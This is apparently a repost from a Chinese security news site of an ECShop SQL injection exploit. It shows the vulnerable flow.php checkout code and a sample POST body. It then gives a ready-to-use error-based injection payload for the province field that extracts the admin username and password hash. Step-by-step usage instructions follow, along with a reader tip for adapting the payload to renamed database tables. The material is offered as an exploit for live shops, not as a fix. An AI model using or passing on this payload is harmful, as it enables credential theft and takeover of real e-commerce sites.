摘要:漏洞原文作者见:ECShop全版本SQL注入0day
http://www.yunsec.net/a/security/bugs/script/2012/1230/12181.html
注入发生在flow.php这个文件: elseif ($_REQUEST['step'] == 'consignee') { ....
$consignee = array( 'address_id' = e...
漏洞原文作者见:ECShop全版本SQL注入0day
http://www.yunsec.net/a/security/bugs/script/2012/1230/12181.html
注入发生在flow.php这个文件:
elseif ($_REQUEST['step'] ==
'consignee')
{
....
$consignee = array(
'address_id'
=>
empty($_POST['address_id']) ? 0 :
intval($_POST['address_id']),
'consignee'
=>
empty($_POST['consignee']) ? '' :
trim($_POST['consignee']),
'country'
=>
empty($_POST['country']) ? ''
: $_POST['country'],
'province'
=>
empty($_POST['province']) ? '' :
$_POST['province'],
'city' =>
empty($_POST['city']) ? '' : $_POST['city'],
'district'
=>
empty($_POST['district']) ? '' :
$_POST['district'],
'email'=>
empty($_POST['email']) ? '' : $_POST['email'],
'address'
=>
empty($_POST['address']) ? ''
: $_POST['address'],
'zipcode'
=>
empty($_POST['zipcode']) ? ''
: make_semiangle(trim($_POST['zipcode'])),
'tel'
=> empty($_POST['tel']) ? '' :
make_semiangle(trim($_POST['tel'])),
'mobile'
=> empty($_POST['mobile']) ? '' :
make_semiangle(trim($_POST['mobile'])),
'sign_building' =>
empty($_POST['sign_building']) ? '' :
$_POST['sign_building'],
'best_time'
=>
empty($_POST['best_time']) ? '' :
$_POST['best_time'],
);
if ($_SESSION['user_id'] > 0){
include_once(ROOT_PATH .
'includes/lib_transaction.php');
$consignee['user_id'] =
$_SESSION['user_id'];
save_consignee($consignee,
true);
}
$_SESSION['flow_consignee'] =
stripslashes_deep($consignee);
ecs_header("Location:
flow.php?step=checkout\n");
exit;
...
复制代码
对POST取值没做处理
原作者对漏洞的描述是:
把任意商品加入购物车在填写配送地址那一页,有地区选择,随便选个地区,post数据为
country=1&province=11&city=152&district=1294&consignee=1111111&email=111111@qq.com&address=1111111&zipcode=&tel=1111111&mobile=&sign_building=&best_time=&Submit=配送至这个地址&step=consignee&act=checkout&address_id=
复制代码
修改province这个变量,可以进行错误回显注入
那么我给个代码,登陆目标网站,注册,选任意一件商品加入到购物车,然后结算,将下面的代码保存为html就可以注入了
ECSHOP通版本注入漏洞 2012圣诞版简单EXP [ Silic Group Hacker Army
]
11'and(select 1 from(select count(*),concat(floor(rand(0)*2),0x3a,(select(select(SELECT concat(user_name,0x3a,password)FROM ecs_admin_user limit 0,1))from information_schema.tables limit 0,1))x from information_schema.tables group by x)a) and 1=1#
地址:
// 云安全 www.yunsec.net
效果如下:
*注:原作者贴出的漏洞描述中,province=11')xxxx....语句,经本文作者测试,有的版本是不需要括号)闭合的,大家可以这个语句限mysql
5.x版本,4.x不适用。
ropin :
补充一下,如果使用不成功,注意看报错语句:MySQL server error report:Array ( [0]
=> Array ( [message] => MySQL Query Error ) [1] => Array (
[sql] => SELECT region_id, region_name FROM
`asky880`.`jf_region` WHERE r。看到了没,
这个网站更改了数据库的默认名字,在exp里面也要相应的修改,把ecs_admin_user改为jf_admin_user
文章出处:中国云安网(www.yunsec.net)
http://www.yunsec.net/a/security/web/jbst/2013/0111/12225.html